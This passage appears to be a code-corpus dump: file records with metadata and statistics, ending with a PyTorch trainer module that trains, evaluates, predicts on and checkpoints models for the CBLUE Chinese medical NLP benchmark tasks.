if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 58.468132
| 1,197
| 0.662858
| 6,219
| 53,206
| 5.321917
| 0.085062
| 0.051002
| 0.027193
| 0.01837
| 0.848838
| 0.7969
| 0.7504
| 0.74043
| 0.737167
| 0.735807
| 0
| 0.019148
| 0.260892
| 53,206
| 909
| 1,198
| 58.532453
| 0.822479
| 0.378284
| 0
| 0.5
| 1
| 0
| 0.233748
| 0.117457
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009934
| false
| 0.003311
| 0.024834
| 0.001656
| 0.054636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
73ce3536add53322859b0781ef6fbceac84102e0
| 146
|
py
|
Python
|
demo_scripts/app.py
|
groverpr/aws-fraud-detector-samples
|
a1f178ee4389416b93750abb1db622f74a6b3cb4
|
[
"MIT-0"
] | null | null | null |
demo_scripts/app.py
|
groverpr/aws-fraud-detector-samples
|
a1f178ee4389416b93750abb1db622f74a6b3cb4
|
[
"MIT-0"
] | null | null | null |
demo_scripts/app.py
|
groverpr/aws-fraud-detector-samples
|
a1f178ee4389416b93750abb1db622f74a6b3cb4
|
[
"MIT-0"
] | 1
|
2022-01-25T20:48:22.000Z
|
2022-01-25T20:48:22.000Z
|
from click_web import create_click_web_app
import create_afd_resources
app = create_click_web_app(create_afd_resources, create_afd_resources.cli)
| 36.5
| 74
| 0.89726
| 24
| 146
| 4.916667
| 0.375
| 0.20339
| 0.457627
| 0.288136
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068493
| 146
| 4
| 74
| 36.5
| 0.867647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fb5bcee324d2c1b4afd51fd4cb18ee1f4c93732e
| 96,345
|
py
|
Python
|
cblue/trainer/train.py
|
dfhby0/CBLUE
|
36bdb52f17c4379d4a5f8b407890ba294017b5e2
|
[
"Apache-2.0"
] | 293
|
2021-06-07T06:04:37.000Z
|
2022-03-28T09:38:28.000Z
|
cblue/trainer/train.py
|
dfhby0/CBLUE
|
36bdb52f17c4379d4a5f8b407890ba294017b5e2
|
[
"Apache-2.0"
] | 6
|
2021-06-11T09:50:15.000Z
|
2022-03-18T07:33:56.000Z
|
cblue/trainer/train.py
|
dfhby0/CBLUE
|
36bdb52f17c4379d4a5f8b407890ba294017b5e2
|
[
"Apache-2.0"
] | 61
|
2021-06-07T06:38:42.000Z
|
2022-03-30T07:16:46.000Z
|
import os
import json
import numpy as np
import torch
import torch.nn as nn
from transformers import AdamW, get_linear_schedule_with_warmup
from torch.utils.data import Dataset, DataLoader
from cblue.utils import seed_everything, ProgressBar, TokenRematch
from cblue.metrics import sts_metric, qic_metric, qqr_metric, qtr_metric, \
ctc_metric, ee_metric, er_metric, re_metric, cdn_cls_metric, cdn_num_metric
from cblue.metrics import sts_commit_prediction, qic_commit_prediction, qtr_commit_prediction, \
qqr_commit_prediction, ctc_commit_prediction, ee_commit_prediction, cdn_commit_prediction
from cblue.models import convert_examples_to_features, save_zen_model
class Trainer(object):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
self.args = args
self.model = model
self.data_processor = data_processor
self.tokenizer = tokenizer
if train_dataset is not None and isinstance(train_dataset, Dataset):
self.train_dataset = train_dataset
if eval_dataset is not None and isinstance(eval_dataset, Dataset):
self.eval_dataset = eval_dataset
self.logger = logger
self.model_class = model_class
self.ngram_dict = ngram_dict
def train(self):
args = self.args
logger = self.logger
model = self.model
model.to(args.device)
train_dataloader = self.get_train_dataloader()
num_training_steps = len(train_dataloader) * args.epochs
num_warmup_steps = num_training_steps * args.warmup_proportion
num_examples = len(train_dataloader.dataset)
no_decay = ['bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
'weight_decay': self.args.weight_decay},
{'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],
'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=num_warmup_steps,
num_training_steps=num_training_steps)
if args.task_name in ['qic', 'qqr', 'qtr', 'sts']:
seed_everything(args.seed)
model.zero_grad()
logger.info("***** Running training *****")
logger.info("Num samples %d", num_examples)
logger.info("Num epochs %d", args.epochs)
logger.info("Num training steps %d", num_training_steps)
logger.info("Num warmup steps %d", num_warmup_steps)
global_step = 0
best_step = None
best_score = .0
cnt_patience = 0
for i in range(args.epochs):
pbar = ProgressBar(n_total=len(train_dataloader), desc='Training')
for step, item in enumerate(train_dataloader):
loss = self.training_step(model, item)
pbar(step, {'loss': loss.item()})
if args.max_grad_norm:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
if args.task_name in ['qic', 'qqr', 'qtr', 'sts']:
model.zero_grad()
else:
optimizer.zero_grad()
global_step += 1
if args.logging_steps > 0 and global_step % args.logging_steps == 0:
print("")
score = self.evaluate(model)
if score > best_score:
best_score = score
best_step = global_step
cnt_patience = 0
self._save_checkpoint(model, global_step)
else:
cnt_patience += 1
self.logger.info("Earlystopper counter: %s out of %s", cnt_patience, args.earlystop_patience)
if cnt_patience >= self.args.earlystop_patience:
break
if cnt_patience >= args.earlystop_patience:
break
logger.info("Training Stop! The best step %s: %s", best_step, best_score)
if args.device == 'cuda':
torch.cuda.empty_cache()
self._save_best_checkpoint(best_step=best_step)
return global_step, best_step
def evaluate(self, model):
raise NotImplementedError
def _save_checkpoint(self, model, step):
raise NotImplementedError
def _save_best_checkpoint(self, best_step):
raise NotImplementedError
def training_step(self, model, item):
raise NotImplementedError
def get_train_dataloader(self):
return DataLoader(
self.train_dataset,
batch_size=self.args.train_batch_size,
shuffle=True
)
def get_eval_dataloader(self):
return DataLoader(
self.eval_dataset,
batch_size=self.args.eval_batch_size,
shuffle=False
)
def get_test_dataloader(self, test_dataset, batch_size=None):
if not batch_size:
batch_size = self.args.eval_batch_size
return DataLoader(
test_dataset,
batch_size=batch_size,
shuffle=False
)
class EETrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(EETrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
labels = item[3].to(self.args.device)
if self.args.model_type == 'zen':
input_ngram_ids = item[4].to(self.args.device)
ngram_attention_mask = item[5].to(self.args.device)
ngram_token_type_ids = item[6].to(self.args.device)
ngram_position_matrix = item[7].to(self.args.device)
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids,
labels=labels, ngram_ids=input_ngram_ids, ngram_positions=ngram_position_matrix,
ngram_attention_mask=ngram_attention_mask, ngram_token_type_ids=ngram_token_type_ids)
else:
outputs = model(labels=labels, input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
labels = item[3].to(self.args.device)
if args.model_type == 'zen':
input_ngram_ids = item[4].to(self.args.device)
ngram_attention_mask = item[5].to(self.args.device)
ngram_token_type_ids = item[6].to(self.args.device)
ngram_position_matrix = item[7].to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask,
labels=labels, ngram_ids=input_ngram_ids,
ngram_positions=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids,
ngram_attention_mask=ngram_attention_mask)
else:
outputs = model(labels=labels, input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
# outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
# active_index = inputs['attention_mask'].view(-1) == 1
active_index = attention_mask.view(-1) == 1
active_labels = labels.view(-1)[active_index]
logits = logits.argmax(dim=-1)
active_logits = logits.view(-1)[active_index]
if preds is None:
preds = active_logits.detach().cpu().numpy()
eval_labels = active_labels.detach().cpu().numpy()
else:
preds = np.append(preds, active_logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, active_labels.detach().cpu().numpy(), axis=0)
p, r, f1, _ = ee_metric(preds, eval_labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def predict(self, model, test_dataset):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
predictions = []
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
input_ids = item[0].to(self.args.device)
token_type_ids = item[1].to(self.args.device)
attention_mask = item[2].to(self.args.device)
if args.model_type == 'zen':
input_ngram_ids = item[3].to(self.args.device)
ngram_attention_mask = item[4].to(self.args.device)
ngram_token_type_ids = item[5].to(self.args.device)
ngram_position_matrix = item[6].to(self.args.device)
with torch.no_grad():
if self.args.model_type == 'zen':
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask,
ngram_ids=input_ngram_ids,
ngram_positions=ngram_position_matrix,
ngram_token_type_ids=ngram_token_type_ids,
ngram_attention_mask=ngram_attention_mask)
else:
outputs = model(input_ids=input_ids, token_type_ids=token_type_ids,
attention_mask=attention_mask)
if args.model_type == 'zen':
logits = outputs.detach()
else:
logits = outputs[0].detach()
# active_index = (inputs['attention_mask'] == 1).cpu()
active_index = attention_mask == 1
preds = logits.argmax(dim=-1).cpu()
for i in range(len(active_index)):
predictions.append(preds[i][active_index[i]].tolist())
pbar(step=step, info="")
# test_inputs = [list(text) for text in test_dataset.texts]
test_inputs = test_dataset.texts
predictions = [pred[1:-1] for pred in predictions]
predicts = self.data_processor.extract_result(predictions, test_inputs)
ee_commit_prediction(dataset=test_dataset, preds=predicts, output_dir=args.result_output_dir)
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class STSTrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(STSTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
text2 = item[1]
labels = item[2].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
# default using 'Transformers' library models.
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
labels = item[2].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
p, r, f1, _ = sts_metric(preds, eval_labels)
logger.info("%s-%s precision: %s - recall: %s - f1 score: %s", args.task_name, args.model_name, p, r, f1)
return f1
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
sts_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
return preds
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class QICTrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(QICTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
labels = item[1].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, padding='max_length', max_length=self.args.max_length,
truncation=True, return_tensors='pt')
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
# default using 'Transformers' library models.
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
labels = item[1].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
acc = qic_metric(preds, eval_labels)
logger.info("%s-%s acc: %s", args.task_name, args.model_name, acc)
return acc
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if self.args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
qic_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
return preds
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=self.args.output_dir)
self.logger.info('Saving models checkpoint to %s', self.args.output_dir)
class QQRTrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(QQRTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
text2 = item[1]
labels = item[2].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
# default using 'Transformers' library models.
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
labels = item[2].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
acc = qqr_metric(preds, eval_labels)
logger.info("%s-%s acc: %s", args.task_name, args.model_name, acc)
return acc
def predict(self, test_dataset, model):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Prediction')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item[0]
text2 = item[1]
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, text2=text2, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, text2, return_tensors='pt', padding='max_length',
truncation='longest_first', max_length=self.args.max_length)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if self.args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step=step, info="")
preds = np.argmax(preds, axis=1)
qqr_commit_prediction(dataset=test_dataset, preds=preds, output_dir=args.result_output_dir,
id2label=self.data_processor.id2label)
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels)
if self.args.model_type == 'zen':
save_zen_model(self.args.output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(self.args.output_dir)
torch.save(self.args, os.path.join(self.args.output_dir, 'training_args.bin'))
